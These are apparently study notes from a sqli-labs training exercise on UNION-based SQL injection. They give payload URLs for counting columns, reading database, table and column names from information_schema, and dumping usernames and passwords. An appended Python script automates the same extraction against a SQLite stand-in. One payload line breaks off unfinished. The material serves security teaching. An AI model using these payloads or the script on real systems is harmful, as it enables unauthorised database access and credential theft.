Columns of the example news table: id title content time author
select * from news where id = 1;
select version();
select * from news where id = 1 order by 1; ORDER BY n sorts the result by its n-th column, so raising n until the query errors reveals the number of columns: the last n that still succeeds is the column count
select * from news where id = 1 union select 1,2,3,4,version(); UNION appends the rows of a second SELECT to the first; both SELECTs must return the same number of columns (five here, matching the news table), so the count found with ORDER BY decides how many placeholders to write
Practice: http://10.1.2.5:10631/sqli/Less-2/?id=1
First, http://10.1.2.5:10631/sqli/Less-2/?id=1 corresponds to a server-side query of the form select * from <table> where id = 1; the id is inserted as a bare number, so no quote needs closing
http://10.1.2.5:10631/sqli/Less-2/?id=1 order by 1 finds the number of columns; increase the number until the page errors (here it errors at 4, so there are 3 columns)
Because the page only displays the first row, use id=0 so that the original WHERE clause matches nothing and the row produced by the UNION becomes the displayed row: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,version() outputs the desired data, the version number, in the third column
group_concat() joins the values of all matching rows into one comma-separated string, so a page that shows only one row can still display every result
information_schema is a built-in database that describes all other databases:
schemata: names of all databases (column schema_name)
tables: names of all tables (column table_name, with the owning database in table_schema)
columns: names of all columns (column column_name, with table_schema and table_name)
Query all database names: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata The schema_name column of information_schema.schemata lists every database name
Query all tables in the current database: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() database() returns the name of the database the page is using
Query all column names of a table: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = "users" Double quotes work as string delimiters in MySQL's default sql_mode, but single quotes ('users') are the safer choice
Query the contents of the table, one group_concat() per column so that usernames and passwords line up by position: http://10.1.2.5:10631/sqli/Less-2/?id=0 union select 1,group_concat(password),group_concat(username) from
http://10.1.2.5:10631/sqli/Less-1/?id=1' The error message shows '1'' LIMIT 0, 1, which reveals that the server wraps the id in single quotes and appends LIMIT 0,1 after it. An order by appended directly would just become part of the quoted string, so the quote has to be closed first and the rest of the original statement commented out, for example http://10.1.2.5:10631/sqli/Less-1/?id=1' order by 3 %23 (%23 is the URL-encoded #, which starts a MySQL comment)
http://10.1.2.5:10631/sqli/Less-4/?id=") union select 1,2,database() %23 Here the id is wrapped in ("..."), so the payload closes both the double quote and the parenthesis before the injected SQL and comments out the remainder. Rule: when injecting, close every quote and parenthesis the original query left open, then comment out whatever follows
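The whole procedure above (counting columns with ORDER BY, pushing the UNION row into view with id=0, pulling metadata with group_concat, and picking the right closer for the Less-2, Less-1 and Less-4 query shapes), as an added, runnable example that is not part of these notes or of sqli-labs. It uses an in-memory SQLite stand-in for the lab's MySQL backend, so the tables and rows are constructed, MySQL-only names (version(), information_schema, the %23 comment) are replaced by SQLite equivalents noted in comments, and the Less-4 template uses ('...') instead of the lab's ("...") because SQLite treats double quotes as identifiers.

```python
import sqlite3

# Added example, not from the sqli-labs notes above. SQLite stands in for the
# lab's MySQL backend; table names and rows are constructed.


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, content TEXT);
        INSERT INTO news VALUES (1, 'first post', 'hello'), (2, 'second post', 'world');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'admin', 'admin123');
    """)
    return conn


# Server-side query shapes of the three lessons; the page shows only the first
# row. The lab's Less-4 is ("..."); SQLite reads double quotes as identifiers,
# so this stand-in uses ('...') and the closer becomes ') instead of ").
TEMPLATES = {
    "Less-2": "SELECT * FROM news WHERE id = {} LIMIT 0,1",
    "Less-1": "SELECT * FROM news WHERE id = '{}' LIMIT 0,1",
    "Less-4": "SELECT * FROM news WHERE id = ('{}') LIMIT 0,1",
}
CLOSERS = {"Less-2": "", "Less-1": "'", "Less-4": "')"}
COMMENT = " --"   # swallows the trailing LIMIT 0,1; in the lab URLs this is %23 (#)


def vulnerable_page(conn, lesson, id_param):
    """Concatenates id_param into the query exactly like the lab does."""
    try:
        return conn.execute(TEMPLATES[lesson].format(id_param)).fetchone()
    except sqlite3.OperationalError as e:
        return ("ERROR", str(e))   # the lab pages echo the database error


def is_error(row):
    return bool(row) and row[0] == "ERROR"


def inject(lesson, id_value, sql_tail):
    """id value, closer for the open quote/paren, our SQL, then a comment."""
    return f"{id_value}{CLOSERS[lesson]} {sql_tail}{COMMENT}"


def naive_order_by_never_errors(conn, lesson, limit=32):
    """The Less-1 problem: without closing the quote, ORDER BY n is just text
    inside '...', so no n ever errors and the column count cannot be found."""
    return all(not is_error(vulnerable_page(conn, lesson, f"1 ORDER BY {n}"))
               for n in range(1, limit + 1))


def count_columns(conn, lesson, limit=32):
    """ORDER BY n errors once n exceeds the column count; the last good n wins."""
    for n in range(1, limit + 1):
        if is_error(vulnerable_page(conn, lesson, inject(lesson, "1", f"ORDER BY {n}"))):
            return n - 1
    raise RuntimeError("column count not found")


def union_value(conn, lesson, ncols, expr):
    """id=0 matches no real row, so the UNION row is the one displayed.
    expr goes in the last column; the other columns are numbered fillers."""
    cols = [str(i) for i in range(1, ncols)] + [expr]
    row = vulnerable_page(conn, lesson, inject(lesson, "0", "UNION SELECT " + ",".join(cols)))
    if is_error(row):
        raise RuntimeError(row[1])
    return row[-1]


def enumerate_db(conn, lesson):
    n = count_columns(conn, lesson)
    return {
        "columns": n,
        # MySQL: version()
        "version": union_value(conn, lesson, n, "sqlite_version()"),
        # MySQL: group_concat(table_name) FROM information_schema.tables
        #        WHERE table_schema = database()
        "tables": union_value(conn, lesson, n,
                              "group_concat(name) FROM sqlite_master WHERE type='table'"),
        # MySQL: group_concat(column_name) FROM information_schema.columns
        #        WHERE table_schema = database() AND table_name = 'users'
        "user_columns": union_value(conn, lesson, n,
                                    "group_concat(name) FROM pragma_table_info('users')"),
        # one group_concat per wanted column keeps the values aligned by row
        "creds": union_value(conn, lesson, n,
                             "group_concat(username || ':' || password) FROM users"),
    }


if __name__ == "__main__":
    db = build_db()
    for lesson in TEMPLATES:
        print(lesson, "closer", repr(CLOSERS[lesson]), enumerate_db(db, lesson))
```

naive_order_by_never_errors() shows why the Less-1 probe in the notes fails: against the quoted template every ORDER BY value is swallowed by the string literal, while against the bare Less-2 template the fourth value errors as expected. Once the right closer is in CLOSERS, the same count_columns() and union_value() code works against all three query shapes.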